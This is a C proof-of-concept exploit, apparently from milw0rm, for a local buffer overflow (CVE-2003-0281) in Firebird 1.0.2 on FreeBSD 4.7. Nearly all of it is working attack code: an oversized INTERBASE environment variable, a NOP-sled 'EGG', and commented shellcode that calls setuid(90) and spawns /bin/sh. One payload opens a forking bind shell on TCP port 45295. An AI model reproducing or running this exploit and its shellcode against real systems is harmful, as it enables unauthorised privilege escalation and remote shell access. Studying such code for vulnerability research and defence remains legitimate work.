
Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Local Privilege Escalation - CVE-2003-0281/2002-2087

/* DSR-firebird.c
   -------------------------------
Tested on: Firebird 1.0.2 FreeBSD 4.7-RELEASE
This is proof-of-concept code.
bash-2.05a$ ./DSR-firebird
( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )
( (                           by - bob@dtors.net ) )
----------------------------------------------------

Usage: ./DSR-firebird <target#>
Targets:
1. [0xbfbff75d] - gds_inet_server
2. [0xbfbff75c] - gds_lock_mgr
3. [0xbfbff75e] - gds_drop

bash-2.05a$

NOTE: the per-target addresses in the banner above do not match the code
below, which hard-codes one return address (0xbfbff743) for all three
targets; the value in the code is the one actually written into the
INTERBASE environment variable.
*/
  18.  
  19.  
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>     /* execl() -- previously used without a prototype */
/* Firebird binaries this PoC exec()s, at the install path the author tested
 * (/usr/local/firebird on FreeBSD 4.7).  main() picks one per target number;
 * presumably they are setuid, since the payload calls setuid(90) -- verify. */
#define LOCK    "/usr/local/firebird/bin/gds_lock_mgr"
#define DROP    "/usr/local/firebird/bin/gds_drop"
#define INET    "/usr/local/firebird/bin/gds_inet_server"
/* Length of the INTERBASE value built in main(): 1052 filler bytes ('A')
 * followed by the 4-byte return address at offset 1052. */
#define LEN     1056
  27.  
/*
 * Payload for the gds_drop target (byte-identical to inetcode).  FreeBSD
 * i386: setuid(90), then execve("/bin//sh", argv, NULL), then exit() if the
 * exec returns.  Syscall convention as decoded below: arguments pushed right
 * to left, one dummy "return address" dword, syscall number in al, int 0x80.
 * 39 bytes with no NUL inside, so strlen() reports the whole payload.
 */
char dropcode[] =
    "\x31\xc0"              /* xor  eax, eax                        */
    "\x50"                  /* push eax                             */
    "\x6a\x5a"              /* push 0x5a           (uid 90)         */
    "\x53"                  /* push ebx            (dummy ret)      */
    "\xb0\x17"              /* mov  al, 0x17       (setuid)         */
    "\xcd\x80"              /* int  0x80                            */
    "\x31\xc0"              /* xor  eax, eax                        */
    "\x50"                  /* push eax            (NUL terminator) */
    "\x68\x2f\x2f\x73\x68"  /* push "//sh"                          */
    "\x68\x2f\x62\x69\x6e"  /* push "/bin"                          */
    "\x89\xe3"              /* mov  ebx, esp       ("/bin//sh")     */
    "\x50"                  /* push eax            (envp = NULL)    */
    "\x54"                  /* push esp            (argv)           */
    "\x53"                  /* push ebx            (path)           */
    "\x50"                  /* push eax            (dummy ret)      */
    "\xb0\x3b"              /* mov  al, 0x3b       (execve)         */
    "\xcd\x80"              /* int  0x80                            */
    "\x31\xc0"              /* xor  eax, eax                        */
    "\xb0\x01"              /* mov  al, 1          (exit)           */
    "\xcd\x80";             /* int  0x80                            */
  33.  
/*
 * Payload for the gds_inet_server target.  Same 39 bytes as dropcode:
 * setuid(90) followed by execve("/bin//sh", argv, NULL) and a trailing
 * exit(), using the FreeBSD i386 calling convention (args pushed right to
 * left, dummy return slot, number in al, int 0x80).  Contains no NUL.
 */
char inetcode[] =
    "\x31\xc0"              /* xor  eax, eax                        */
    "\x50"                  /* push eax                             */
    "\x6a\x5a"              /* push 0x5a           (uid 90)         */
    "\x53"                  /* push ebx            (dummy ret)      */
    "\xb0\x17"              /* mov  al, 0x17       (setuid)         */
    "\xcd\x80"              /* int  0x80                            */
    "\x31\xc0"              /* xor  eax, eax                        */
    "\x50"                  /* push eax            (NUL terminator) */
    "\x68\x2f\x2f\x73\x68"  /* push "//sh"                          */
    "\x68\x2f\x62\x69\x6e"  /* push "/bin"                          */
    "\x89\xe3"              /* mov  ebx, esp       ("/bin//sh")     */
    "\x50"                  /* push eax            (envp = NULL)    */
    "\x54"                  /* push esp            (argv)           */
    "\x53"                  /* push ebx            (path)           */
    "\x50"                  /* push eax            (dummy ret)      */
    "\xb0\x3b"              /* mov  al, 0x3b       (execve)         */
    "\xcd\x80"              /* int  0x80                            */
    "\x31\xc0"              /* xor  eax, eax                        */
    "\xb0\x01"              /* mov  al, 1          (exit)           */
    "\xcd\x80";             /* int  0x80                            */
  39.  
  40.                            
  41.  
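/*
 * Payload for the gds_lock_mgr target: setuid(90) followed by a forking
 * bind shell on TCP port 45295 (0xb0ef, pushed in network byte order
 * below).  This is what main()'s "Shell is on port 45295 / Exploit will
 * hang!" message refers to.  FreeBSD i386 syscall convention as decoded
 * below: arguments pushed right to left, a dummy "return address" dword,
 * syscall number in al, int 0x80.
 *
 * The listing had the "setuid[firebird] by bob" comment wrapped onto a
 * second line, leaving a bare `bob` token inside the initializer and making
 * the file fail to compile; the comments are rejoined here.  The bytes are
 * unchanged: 222 of them, none NUL, so strlen() gives the full length.
 */
char lockcode[] =
    /* fork(); whichever process gets eax == 0 back (the child, on FreeBSD)
     * exits, the other one carries on */
    "\x31\xc0"              /* xor  eax, eax                            */
    "\x31\xdb"              /* xor  ebx, ebx                            */
    "\xb0\x02"              /* mov  al, 2            (fork)             */
    "\xcd\x80"              /* int  0x80                                */
    "\x39\xc3"              /* cmp  ebx, eax                            */
    "\x75\x06"              /* jne  +6               (skip the exit)    */
    "\x31\xc0"              /* xor  eax, eax                            */
    "\xb0\x01"              /* mov  al, 1            (exit)             */
    "\xcd\x80"              /* int  0x80                                */
    /* setuid(90) -- "setuid[firebird] by bob" */
    "\x31\xc0"              /* xor  eax, eax                            */
    "\x50"                  /* push eax                                 */
    "\x6a\x5a"              /* push 0x5a             (uid 90)           */
    "\x53"                  /* push ebx              (dummy ret)        */
    "\xb0\x17"              /* mov  al, 0x17         (setuid)           */
    "\xcd\x80"              /* int  0x80                                */
    /* "fork() bindshell by eSDee": socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) */
    "\x31\xc0"              /* xor  eax, eax                            */
    "\x31\xdb"              /* xor  ebx, ebx                            */
    "\x53"                  /* push ebx              (0)                */
    "\xb3\x06"              /* mov  bl, 6                               */
    "\x53"                  /* push ebx              (IPPROTO_TCP)      */
    "\xb3\x01"              /* mov  bl, 1                               */
    "\x53"                  /* push ebx              (SOCK_STREAM)      */
    "\xb3\x02"              /* mov  bl, 2                               */
    "\x53"                  /* push ebx              (AF_INET)          */
    "\x54"                  /* push esp              (dummy ret)        */
    "\xb0\x61"              /* mov  al, 0x61         (socket)           */
    "\xcd\x80"              /* int  0x80                                */
    "\x89\xc7"              /* mov  edi, eax         (listening fd)     */
    /* bind(fd, {sin_family = AF_INET, sin_port = 45295, sin_addr = 0}, 16) */
    "\x31\xc0"              /* xor  eax, eax                            */
    "\x50"                  /* push eax              (sin_zero)         */
    "\x50"                  /* push eax              (sin_zero)         */
    "\x50"                  /* push eax              (sin_addr = 0)     */
    "\x66\x68\xb0\xef"      /* pushw 0xefb0          (port 45295, BE)   */
    "\xb7\x02"              /* mov  bh, 2                               */
    "\x66\x53"              /* push bx               (sin_family = 2)   */
    "\x89\xe1"              /* mov  ecx, esp         (&sockaddr_in)     */
    "\x31\xdb"              /* xor  ebx, ebx                            */
    "\xb3\x10"              /* mov  bl, 0x10         (sizeof sockaddr)  */
    "\x53"                  /* push ebx                                 */
    "\x51"                  /* push ecx                                 */
    "\x57"                  /* push edi                                 */
    "\x50"                  /* push eax              (dummy ret)        */
    "\xb0\x68"              /* mov  al, 0x68         (bind)             */
    "\xcd\x80"              /* int  0x80                                */
    "\x31\xdb"              /* xor  ebx, ebx                            */
    "\x39\xc3"              /* cmp  ebx, eax                            */
    "\x74\x06"              /* je   +6               (bind succeeded)   */
    "\x31\xc0"              /* xor  eax, eax                            */
    "\xb0\x01"              /* mov  al, 1            (exit on failure)  */
    "\xcd\x80"              /* int  0x80                                */
    /* listen(fd, 0) */
    "\x31\xc0"              /* xor  eax, eax                            */
    "\x50"                  /* push eax              (backlog 0)        */
    "\x57"                  /* push edi                                 */
    "\x50"                  /* push eax              (dummy ret)        */
    "\xb0\x6a"              /* mov  al, 0x6a         (listen)           */
    "\xcd\x80"              /* int  0x80                                */
    /* sigaction(20, {sa_handler = 1}, &old) -- NOTE(review): looks like
     * SIGCHLD / SIG_IGN on FreeBSD so children need no reaping; verify */
    "\x31\xc0"              /* xor  eax, eax                            */
    "\x31\xdb"              /* xor  ebx, ebx                            */
    "\x50"                  /* push eax                                 */
    "\x89\xe1"              /* mov  ecx, esp                            */
    "\xb3\x01"              /* mov  bl, 1                               */
    "\x53"                  /* push ebx                                 */
    "\x89\xe2"              /* mov  edx, esp                            */
    "\x50"                  /* push eax                                 */
    "\x51"                  /* push ecx                                 */
    "\x52"                  /* push edx                                 */
    "\xb3\x14"              /* mov  bl, 0x14                            */
    "\x53"                  /* push ebx              (signal 20)        */
    "\x50"                  /* push eax              (dummy ret)        */
    "\xb0\x2e"              /* mov  al, 0x2e         (sigaction)        */
    "\xcd\x80"              /* int  0x80                                */
    /* accept loop: accept(fd, NULL, NULL)  <-- target of the final jmp */
    "\x31\xc0"              /* xor  eax, eax                            */
    "\x50"                  /* push eax                                 */
    "\x50"                  /* push eax                                 */
    "\x57"                  /* push edi                                 */
    "\x50"                  /* push eax              (dummy ret)        */
    "\xb0\x1e"              /* mov  al, 0x1e         (accept)           */
    "\xcd\x80"              /* int  0x80                                */
    "\x89\xc6"              /* mov  esi, eax         (client fd)        */
    /* fork(); eax != 0 jumps ahead 0x44 bytes to the close-and-loop tail */
    "\x31\xc0"              /* xor  eax, eax                            */
    "\x31\xdb"              /* xor  ebx, ebx                            */
    "\xb0\x02"              /* mov  al, 2            (fork)             */
    "\xcd\x80"              /* int  0x80                                */
    "\x39\xc3"              /* cmp  ebx, eax                            */
    "\x75\x44"              /* jne  +0x44                               */
    /* eax == 0: close(listening fd), dup2(client, 0/1/2), execve("/bin//sh") */
    "\x31\xc0"              /* xor  eax, eax                            */
    "\x57"                  /* push edi                                 */
    "\x50"                  /* push eax              (dummy ret)        */
    "\xb0\x06"              /* mov  al, 6            (close)            */
    "\xcd\x80"              /* int  0x80                                */
    "\x31\xc0"              /* xor  eax, eax                            */
    "\x50"                  /* push eax              (0)                */
    "\x56"                  /* push esi                                 */
    "\x50"                  /* push eax              (dummy ret)        */
    "\xb0\x5a"              /* mov  al, 0x5a         (dup2 -> stdin)    */
    "\xcd\x80"              /* int  0x80                                */
    "\x31\xc0"              /* xor  eax, eax                            */
    "\x31\xdb"              /* xor  ebx, ebx                            */
    "\x43"                  /* inc  ebx              (1)                */
    "\x53"                  /* push ebx                                 */
    "\x56"                  /* push esi                                 */
    "\x50"                  /* push eax              (dummy ret)        */
    "\xb0\x5a"              /* mov  al, 0x5a         (dup2 -> stdout)   */
    "\xcd\x80"              /* int  0x80                                */
    "\x31\xc0"              /* xor  eax, eax                            */
    "\x43"                  /* inc  ebx              (2)                */
    "\x53"                  /* push ebx                                 */
    "\x56"                  /* push esi                                 */
    "\x50"                  /* push eax              (dummy ret)        */
    "\xb0\x5a"              /* mov  al, 0x5a         (dup2 -> stderr)   */
    "\xcd\x80"              /* int  0x80                                */
    "\x31\xc0"              /* xor  eax, eax                            */
    "\x50"                  /* push eax              (NUL terminator)   */
    "\x68\x2f\x2f\x73\x68"  /* push "//sh"                              */
    "\x68\x2f\x62\x69\x6e"  /* push "/bin"                              */
    "\x89\xe3"              /* mov  ebx, esp         ("/bin//sh")       */
    "\x50"                  /* push eax              (envp = NULL)      */
    "\x54"                  /* push esp              (argv)             */
    "\x53"                  /* push ebx              (path)             */
    "\x50"                  /* push eax              (dummy ret)        */
    "\xb0\x3b"              /* mov  al, 0x3b         (execve)           */
    "\xcd\x80"              /* int  0x80                                */
    "\x31\xc0"              /* xor  eax, eax                            */
    "\xb0\x01"              /* mov  al, 1            (exit)             */
    "\xcd\x80"              /* int  0x80                                */
    /* eax != 0 (jne target): close(client fd), jump back to accept() */
    "\x31\xc0"              /* xor  eax, eax                            */
    "\x56"                  /* push esi                                 */
    "\x50"                  /* push eax              (dummy ret)        */
    "\xb0\x06"              /* mov  al, 6            (close)            */
    "\xcd\x80"              /* int  0x80                                */
    "\xeb\x9a";             /* jmp  -102             (back to accept)   */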
  72.  
/*
 * Map the target number from the command line to its payload:
 * "1" -> inetcode (gds_inet_server), "2" -> lockcode (gds_lock_mgr),
 * "3" -> dropcode (gds_drop).  Any other string terminates the program
 * with status 0 without printing anything, so a non-NULL pointer is the
 * only thing this ever returns.  `string` must itself be non-NULL.
 */
char *decide(char *string)
{
    static const struct {
        const char *key;
        char *code;
    } targets[] = {
        { "1", inetcode },
        { "2", lockcode },
        { "3", dropcode },
    };
    size_t idx;

    for (idx = 0; idx < sizeof targets / sizeof targets[0]; idx++) {
        if (strcmp(string, targets[idx].key) == 0)
            return targets[idx].code;
    }
    exit(0);
}
  83.  
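/*
 * Fill egg[0..egglen-1] with "EGG=" + NOP sled + shellcode, NUL-terminated.
 * Layout (egglen is 1024 in main): egglen - strlen(code) - 1 bytes of 0x90,
 * then the code, then a NUL; the "EGG=" name overwrites the first four sled
 * bytes, so the variable's value is the remaining sled plus the code.
 * Exits with status 1 if the code leaves no room for name, sled and NUL --
 * the original looped with an unsigned length that would wrap in that case.
 */
static void build_egg(char *egg, size_t egglen, const char *code)
{
    size_t codelen = strlen(code);
    size_t sled;

    /* "EGG=" (4) + at least one NOP + code + NUL must fit. */
    if (codelen + 6 > egglen) {
        fprintf(stderr, "shellcode too large for egg (%lu bytes)\n",
                (unsigned long)codelen);
        exit(1);
    }
    sled = egglen - codelen - 1;
    memset(egg, 0x90, sled);
    memcpy(egg + sled, code, codelen);
    egg[egglen - 1] = '\0';
    memcpy(egg, "EGG=", 4);
}

/*
 * Fill the INTERBASE value: LEN - 4 bytes of 'A', the 4-byte return
 * address in host byte order (the i386 target is little-endian), then a
 * NUL.  buffer must hold LEN + 1 bytes: the original stored the NUL at
 * buffer[LEN] of a LEN-byte array, i.e. one past the end of the stack array.
 */
static void build_trigger(char *buffer, unsigned int ret)
{
    memset(buffer, 0x41, LEN);
    memcpy(buffer + LEN - sizeof ret, &ret, sizeof ret);
    buffer[LEN] = '\0';
}

/*
 * Exploit driver.  argv[1] selects the target via decide().  Two environment
 * variables are built and the chosen Firebird binary is exec()ed:
 *
 *   EGG=<nop sled><shellcode>     1023 bytes; the return address is meant
 *                                 to land inside the sled.
 *   INTERBASE=<1052 x 'A'><ret>   LEN bytes; the oversized INTERBASE value
 *                                 is the overflow vector.
 *
 * Returns 0 after printing usage when no target is given, exits 0 on an
 * unknown target (see decide()), never returns if the exec succeeds, and
 * returns 1 with a perror() message if the exec fails.  Fixes against the
 * original: the banner strings were split across lines (did not compile),
 * ret was an unsigned long printed with %x, buffer[LEN] was written one
 * past the end of buffer[LEN], execl's terminating NULL was not cast, exec
 * failure was silent, and stdout was not flushed before exec.
 */
int main(int argc, char **argv)
{
    unsigned int ret = 0xbfbff743;  /* one return address for all targets */
    char *selectcode;
    char buffer[LEN + 1];           /* +1: NUL terminator after the ret   */
    char egg[1024];
    const char *target;

    if (argc < 2) {
        printf("( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )\n");
        printf("( (                           by - bob@dtors.net ) )\n");
        printf("----------------------------------------------------\n\n");
        printf("Usage: %s <target#> \n", argv[0]);
        printf("Targets:\n");
        printf("1. [0xbfbff743] - gds_inet_server\n");
        printf("2. [0xbfbff743] - gds_lock_mgr\n");
        printf("3. [0xbfbff743] - gds_drop\n");
        printf("\nwww.dtors.net\n");
        exit(0);
    }

    selectcode = decide(argv[1]);

    /* putenv() keeps a pointer to egg; that is fine because we either
     * exec or return from main without touching the environment again. */
    build_egg(egg, sizeof egg, selectcode);
    putenv(egg);

    build_trigger(buffer, ret);
    setenv("INTERBASE", buffer, 1);

    fprintf(stdout, "Return Address: 0x%x\n", ret);
    fprintf(stdout, "Buffer Size: %d\n", LEN);
    fprintf(stdout, "Setuid [90]\n");

    if (selectcode == inetcode) {
        target = INET;
    } else if (selectcode == lockcode) {
        printf("\nShell is on port 45295\nExploit will hang!\n");
        target = LOCK;
    } else if (selectcode == dropcode) {
        target = DROP;
    } else {
        return 0;   /* unreachable: decide() returns one of the three */
    }

    /* Flush before exec so the messages survive when stdout is a pipe. */
    fflush(stdout);
    execl(target, target, (char *)NULL);
    perror(target);
    return 1;
}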
  157.  
  158.  
  159. // milw0rm.com [2003-05-12]
  160.            